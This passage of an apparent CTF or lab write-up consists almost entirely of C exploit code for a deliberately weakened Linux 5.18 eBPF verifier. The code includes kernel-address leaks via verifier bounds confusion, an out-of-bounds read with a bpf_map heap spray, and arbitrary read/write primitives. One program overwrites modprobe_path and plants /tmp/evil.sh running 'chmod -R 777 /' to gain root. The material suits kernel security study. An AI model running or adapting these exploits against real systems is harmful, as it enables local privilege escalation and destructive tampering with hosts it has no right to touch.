      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
